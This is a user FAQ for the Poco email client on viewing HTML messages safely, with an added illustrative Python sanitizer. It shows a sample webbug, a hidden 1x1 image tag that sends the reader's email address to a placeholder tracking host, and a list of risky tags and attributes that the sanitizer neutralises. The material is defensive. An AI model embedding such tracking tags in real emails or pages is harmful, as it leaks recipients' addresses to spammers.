Poco Reading FAQ - Secure Display of HTML Messages

Q: How can I view HTML messages without all the security risks (such as webbugs)?
In Poco 3, there are a couple of new features related to HTML display. Take a look at the small toolbar above the preview pane. Among the other icons, there are three of note:

If you don't see these buttons, you may have turned them off. To turn them on, right-click in the small toolbar and select Show Security Control.

Before explaining how the buttons differ, here's what they all have in common: If any of the three security features is active (the button will show a dark background when using the default colors), no images will be fetched from external sources on the Internet.

Here's what each button does, in order from left to right:

Tri-color button: "Toggle image downloading," same as Poco 2's "Download external images" button.
This stops Poco from retrieving external images when you open an HTML message. This option is useful, for example, for preventing spammers from verifying your address via webbugs.

Note: If an image is already in the cache from a previous fetch, it will still appear if only Toggle Image Downloading is disabled.

Tri-color button with black censorship boxes: Sanitize Message.
"Sanitize Message" does much more than merely avoid the downloading of an image. It takes all the suspicious Javascript, webbugs, background sounds and image HTML tags, etc., and mangles the possibly-malicious script and external references.

Instead of saying something like:

<img height=1 width=1 src=http://WeAreSpyingOnYou.com?PersonalData=YourEmailAddress>
A Poco3-sanitized webbug will say something like the following (emphasis added):
<sanitized_img height=1 width=1 sanitized_src=http://WeAreSpyingOnYou.com?PersonalData=YourEmailAddress>

This mangling means the HTML command is not executed, so the external data is never requested. The effect is display-only; the email itself is not changed.
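The mangling described above, written out as a small illustrative sanitizer. This is an added example, not Poco's own code: the lists of tags and attributes it neutralises are assumptions modelled on the FAQ's description (images, script, background sounds, external references), and the regular-expression approach is a simplification that a production sanitizer would replace with a real HTML parser.

```python
import re

# Assumed list of tags that fetch external content or run script; the FAQ
# names images, script and background sounds but not Poco's exact set.
SUSPICIOUS_TAGS = {"img", "script", "bgsound", "iframe", "object", "embed"}
# Assumed list of attributes that trigger a fetch on their own (e.g. a
# background image on <body>), plus any on* event handler attribute.
SUSPICIOUS_ATTRS = {"src", "background", "dynsrc", "lowsrc"}

# Simplified tag matcher: a '>' inside a quoted attribute value would break it.
TAG_RE = re.compile(r"<(/?)([a-zA-Z][\w-]*)([^>]*)>", re.S)
# Attribute names are preceded by whitespace and followed by '='; an unquoted
# URL value such as ...?PersonalData=YourEmailAddress contains no whitespace
# before the second '=', so it is left untouched.
ATTR_RE = re.compile(r"(\s)([a-zA-Z][\w-]*)(\s*=)")


def _mangle_attrs(attrs: str) -> str:
    """Prefix fetch-triggering and event-handler attributes with sanitized_."""
    def repl(m: re.Match) -> str:
        name = m.group(2)
        if name.lower() in SUSPICIOUS_ATTRS or name.lower().startswith("on"):
            return f"{m.group(1)}sanitized_{name}{m.group(3)}"
        return m.group(0)
    return ATTR_RE.sub(repl, attrs)


def sanitize(html: str) -> str:
    """Return a display-only copy of the HTML with risky tags and attributes
    renamed. A browser treats <sanitized_img> as an unknown element and never
    issues the request behind sanitized_src, which is the whole point."""
    def repl(m: re.Match) -> str:
        slash, name, attrs = m.groups()
        if name.lower() in SUSPICIOUS_TAGS:
            name = f"sanitized_{name}"
        return f"<{slash}{name}{_mangle_attrs(attrs)}>"
    return TAG_RE.sub(repl, html)


if __name__ == "__main__":
    # Constructed sample modelled on the webbug in the FAQ.
    webbug = ("<img height=1 width=1 "
              "src=http://WeAreSpyingOnYou.com?PersonalData=YourEmailAddress>")
    print(sanitize(webbug))
```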

The idea is to increase security and privacy. Spammers use webbugs and regular external images as a form of return-receipt: when you read the email, the image is fetched and your email address is validated. This can leave you open to a lot more spam.

Since it's a toggle, you can easily enable it for a particular email if you trust the source.

Meanwhile, "Download External Images" (new form: "Toggle Image Downloading") simply enables or disables the fetching of external images only. The content of the email is not changed even for display. A placeholder the size of the original picture appears in the email with a black exclamation mark on a yellow background, indicating that downloading is disabled. This placeholder won't appear if "Sanitize Message" is enabled.

With image downloading disabled, a newsletter will have a lot of frames with black-on-yellow exclamation-mark placeholders, but the form of the newsletter will be preserved. A sanitized newsletter will look quite different.

Gray envelope icon: Strip HTML.
This will basically turn an HTML message into a plaintext message.